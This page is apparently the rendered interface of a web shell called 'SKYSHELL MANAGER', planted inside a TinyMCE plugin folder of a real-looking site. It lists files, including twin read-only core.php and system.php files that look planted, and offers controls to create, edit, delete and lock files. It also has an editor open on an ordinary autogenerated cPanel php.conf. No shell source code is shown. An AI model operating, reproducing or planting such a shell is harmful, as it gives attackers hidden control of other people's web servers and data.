📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
tinymce
/
plugins
/
autolink
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
core.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
13388.26 KB
0644
🗑️
⬇️
✏️
🔒
📄
system.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
Editing: php.conf
# This file was automatically generated by the Cpanel php # Configuration system. If you wish to change the way php is being # handled by Apache on your system, use the # /usr/local/cpanel/bin/rebuild_phpconf script or the WHM interface. # # Manual edits of this file will be lost when the configuration is # rebuilt. # These initial handlers serve as fallback in case there is any # time between when configuration has changed and when it takes effect. # We use CGI style since it is simple and the default we use elsewhere. # If the version is not set to CGI they will get a 404 until the new # configuration takes effect which is better than serving source # code until the new configuration takes effect. <IfModule actions_module> Action application/x-httpd-ea-php72 /cgi-sys/ea-php72 Action application/x-httpd-ea-php73 /cgi-sys/ea-php73 Action application/x-httpd-ea-php74 /cgi-sys/ea-php74 </IfModule> # suPHP configuration for ea-php72 <IfModule suphp_module> suPHP_Engine on <Directory /> suPHP_AddHandler application/x-httpd-ea-php72 </Directory> </IfModule> # suPHP configuration for ea-php73 <IfModule suphp_module> suPHP_Engine on <Directory /> suPHP_AddHandler application/x-httpd-ea-php73 </Directory> </IfModule> # Set ea-php74 as the system default for php <IfModule mime_module> AddHandler application/x-httpd-ea-php74 .php .php7 .phtml </IfModule> # suPHP configuration for ea-php74 <IfModule suphp_module> suPHP_Engine on <Directory /> suPHP_AddHandler application/x-httpd-ea-php74 </Directory> </IfModule> # End of autogenerated php configuration.
💾 Save Changes